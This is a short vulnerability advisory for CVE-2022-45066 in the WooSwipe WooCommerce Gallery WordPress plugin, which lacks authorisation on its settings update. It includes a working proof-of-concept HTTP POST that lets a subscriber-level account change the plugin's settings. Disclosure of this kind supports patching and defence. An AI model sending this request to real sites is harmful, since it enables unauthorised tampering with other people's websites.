WooSwipe WooCommerce Gallery < 3.0.0 – Subscriber+ Settings Update | CVE 2022-45066

Description

The plugin does not have any authorisation when updating its settings, which could allow any authenticated users, such as subscriber to update them

Proof of Concept

POST /wp-admin/admin.php?page=wooswipe-options HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------1848431393440185984976916911
Content-Length: 565
Connection: close
Cookie: [subscriber+]
Upgrade-Insecure-Requests: 1

-----------------------------1848431393440185984976916911
Content-Disposition: form-data; name="white_theme"

checkbox
-----------------------------1848431393440185984976916911
Content-Disposition: form-data; name="icon_bg_color"

#000000
-----------------------------1848431393440185984976916911
Content-Disposition: form-data; name="icon_stroke_color"

#ffffff
-----------------------------1848431393440185984976916911
Content-Disposition: form-data; name="wooswipe_save"

Save Changes
-----------------------------1848431393440185984976916911--


Even though the response will be a 403, the settings will be updated